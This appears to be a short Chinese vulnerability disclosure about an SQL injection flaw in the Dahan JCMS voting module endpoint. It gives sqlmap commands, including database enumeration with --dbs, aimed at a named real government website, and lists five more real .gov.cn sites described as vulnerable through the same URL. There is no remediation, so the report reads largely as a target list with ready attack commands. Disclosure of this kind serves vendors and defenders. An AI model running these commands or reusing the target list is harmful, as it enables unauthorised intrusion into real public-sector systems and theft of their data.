大汉版通系统SQL注入漏洞

### 简要描述： 大汉版通系统SQL注入漏洞 ### 详细说明： 貌似，Prize 奖励方案改了 SO...又来一发，JCMS最新注入漏洞 该连接存在SQL注入 /jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B sqlmap.py -u "http://www.wugang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B" [<img src="https://images.seebug.org/upload/201409/242202451e41629e46be3b40db79e28813c774ca.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/242202451e41629e46be3b40db79e28813c774ca.jpg) sqlmap.py -u "http://www.wugang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B" --dbs [<img src="https://images.seebug.org/upload/201409/24220131e2df2cda18e591fa84a989649622a61f.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/24220131e2df2cda18e591fa84a989649622a61f.jpg) 其它案例： http://www.wugang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.sdjs.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.taojiang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://anxiang.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B http://www.czjj.gov.cn/jcms/m_5_e/module/voting/opr_voting_modal.jsp?i_ID=11&fn_billstatus=B ### 漏洞证明： [<img src="https://images.seebug.org/upload/201409/24220131e2df2cda18e591fa84a989649622a61f.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/24220131e2df2cda18e591fa84a989649622a61f.jpg)